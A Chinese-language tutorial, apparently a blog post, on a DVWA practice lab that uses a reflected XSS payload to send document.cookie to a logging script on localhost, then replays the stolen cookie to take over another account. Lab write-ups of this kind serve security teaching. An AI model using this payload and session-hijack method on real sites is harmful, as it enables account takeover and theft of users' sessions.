dvwa下利用xss获取cookie并利用(绕过验证)

简介: dvwa下利用xss获取cookie并利用(绕过验证)

一、准备

首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录

这里就以low级别进行操作

二、获取cookie

选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script>

 

确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:\wamp\www(仅供参考)

 

目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt

接下来需要根据题目构造js语句


<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>  #语句是跳转执行访问指定的文件, 并在url中显示cookie


使用js语句获取cookie的两种方式:


第一种方式:url栏输入,进行url编码


原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=
<script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
需要进行URL编码:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#



第二种方式是在xss注入处直接些参数

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

 

 

 


提交,成功的话会跳转到另一个界面

 

 

 


现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本

 

另外能够看到浏览器url框内有一个cookie的值

三、攻击者利用获取到的cookie登录到受害者的账户


第一种方式:修改浏览器记录的cookie


获取到cookie后打开另外一个浏览器访问dvwa(此浏览器用别的账号登陆过DVWA,所以浏览器有对应的cookie格式)(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值。


修改cookie为获取的cookie 并将security 设为low ,然后输入目标用户的ID和密码登陆目标用户,

 

 

 

 

第二种方式:使用burpsuite 抓包,改包,

ok,已经成功利用获取到的cookie进行登录

 


相关文章
|
19天前
|
安全 前端开发 JavaScript
[dvwa] xss reflected
[dvwa] xss reflected
|
19天前
|
存储 前端开发 安全
|
安全 JavaScript 前端开发
[网络安全]XSS之Cookie外带攻击姿势及例题详析
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。
547 0
|
SQL 存储 JavaScript
[网络安全]DVWA之XSS(Stored)攻击姿势及解题详析合集
trim() 函数移除字符串两侧的空格,以确保数据在插入到数据库时没有多余的空白字符
82 0
[网络安全]DVWA之XSS(Stored)攻击姿势及解题详析合集
|
机器学习/深度学习 存储 网络协议
[网络安全]DVWA之XSS(Reflected)攻击姿势及解题详析合集
先提交name1 浏览顶部URL栏发现为GET请求
91 0
|
JavaScript 前端开发 网络安全
[网络安全]DVWA之XSS(DOM)攻击姿势及解题详析合集
XSS(DOM)-low level 源代码未进行任何过滤 复选框中的内容为可变参数
125 0
|
移动开发 安全 JavaScript
XSS绕过安全狗方法【持续更新】
XSS绕过安全狗方法【持续更新】
346 0
|
存储 Web App开发 编解码
浏览器原理 32 # 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
浏览器原理 32 # 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
106 0
浏览器原理 32 # 跨站脚本攻击(XSS):为什么Cookie中有HttpOnly属性?
|
Shell Linux 网络安全
【靶机】xss盗取cookie-sqlmap进阶-通配符提权-docker逃逸-The Marketplace
靶机难度中等,对小白不太友好,建议边打边看,学习一下思路。
264 0
|
数据库 数据安全/隐私保护 Python
python接口自动化(十三)--cookie绕过验证码登录(详解)
有些登录的接口会有验证码:短信验证码,图形验证码等,这种登录的话验证码参数可以从后台获取的(或者查数据库最直接)。获取不到也没关系,可以通过添加cookie的方式绕过验证码。(注意:并不是所有的登录都是用cookie来保 持登录的,有些是用token登录)
396 0
python接口自动化(十三)--cookie绕过验证码登录(详解)